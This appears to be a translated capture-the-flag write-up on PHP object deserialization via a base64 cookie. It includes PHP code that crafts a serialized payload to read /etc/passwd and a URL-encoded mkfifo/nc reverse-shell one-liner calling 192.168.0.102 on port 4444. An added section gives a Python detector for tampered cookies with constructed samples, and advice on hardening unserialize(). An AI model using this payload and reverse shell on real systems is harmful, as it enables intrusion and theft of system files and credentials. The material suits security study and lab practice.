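Press F12 to inspect the page: there is a base64-encoded string.
The cookie turns out to be base64-encoded; after decoding, it proves to be serialized data.
Scanning with Yujian (御剑) reveals a backup path.
Code audit
This yields three PHP files; put them together.
After auditing the code, a payload can be constructed; try to read the passwd file.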
<?php
class Log {
    private $type_log = "/etc/passwd";
}
class User {
    private $name = "admin";
    private $wel;
    function __construct() {
        $this->wel = new Log();
    }
}
$obj = new User();
echo base64_encode(serialize($obj));
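Seen from the defending side, a cookie of the kind described above can be picked out of request logs. The following is an added example, not part of the original write-up: it decodes a cookie value and reports PHP serialized objects, unexpected class names and path-like strings. The EXPECTED class set and the sample cookie values are constructed assumptions.

```python
import base64, binascii, re
from urllib.parse import unquote

# PHP serialize() object header: O:<len>:"<class>":<property count>:{
OBJ_RE = re.compile(rb'[OC]:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:\{')
# Serialized string whose value starts with "/" (looks like an absolute path)
PATH_RE = re.compile(rb's:\d+:"(/[^"]*)"')
# Assumption: the only class the application itself stores in the cookie.
EXPECTED = {"User"}

def decode_cookie(value):
    """URL-decode, then strictly base64-decode; None if it is not base64."""
    raw = unquote(value).strip()
    raw += "=" * (-len(raw) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return None

def inspect_cookie(value):
    """Return (class names, findings) for one cookie value."""
    data = decode_cookie(value)
    if data is None:
        return [], []
    classes = [m.group(1).decode() for m in OBJ_RE.finditer(data)]
    findings = [f"unexpected class {c}" for c in classes if c not in EXPECTED]
    if len(classes) > 1:
        findings.append("nested object")
    findings += [f"path-like string {m.group(1).decode(errors='replace')}"
                 for m in PATH_RE.finditer(data)]
    return classes, findings

def _b64(serialized):
    return base64.b64encode(serialized).decode()

# Constructed sample cookie values (not captured traffic).
SAMPLES = {
    "benign": _b64(b'O:4:"User":1:{s:4:"name";s:5:"guest";}'),
    "tampered": _b64(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";'
                     b's:9:"\x00User\x00wel";O:3:"Log":1:'
                     b'{s:13:"\x00Log\x00type_log";s:11:"/etc/passwd";}}'),
    "not_base64": "theme=dark",
}

if __name__ == "__main__":
    for name, cookie in SAMPLES.items():
        print(name, inspect_cookie(cookie))
```

The durable fix is on the server: do not pass cookie data to unserialize() at all, or call it with the allowed_classes option set to false and authenticate the cookie before parsing it.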
Getting a shell
Set up a one-line webshell
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f
Got the password.